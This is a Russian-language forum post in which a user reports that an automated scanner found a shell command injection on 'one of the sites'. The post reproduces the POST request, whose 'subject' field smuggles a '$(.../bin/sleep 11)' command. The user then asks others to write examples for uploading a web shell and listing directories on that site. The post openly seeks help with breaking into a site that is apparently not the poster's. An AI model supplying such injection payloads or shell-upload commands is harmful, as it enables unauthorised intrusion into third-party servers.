Показать сообщение отдельно

  #1  
Старый 04.09.2019, 11:32
FileBanana
Новичок
Регистрация: 09.12.2015
Сообщений: 13
С нами: 5488886

Репутация: 0
По умолчанию

Добрый день.

Автоматический поиск уязвимостей на одном из сайтов нашел экзотическую для меня уязвимость "Внедрение команды оболочки в параметры файла"

POST *****/?page_num=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Referer: http://*****/r=1

Cookie: PHPSESSID=******

Connection: Keep-Alive

Host: ********

Content-Length: 94

Accept: text/html,application/xhtml+xml,application/xml;q=0.9;q=0.8

Accept-Language: en-US

Content-Type: application/x-www-form-urlencoded

action=support&subject=1234$(../../../../../../../../../../../../bin/sleep 11)&message=25

Как корректно вставить команду заливки шела и просмотра содержимого каталога?

Что то мои скудные познания в Nix-системах не дают результатов.

Прошу набросать пару толковых примеров.
 
Ответить с цитированием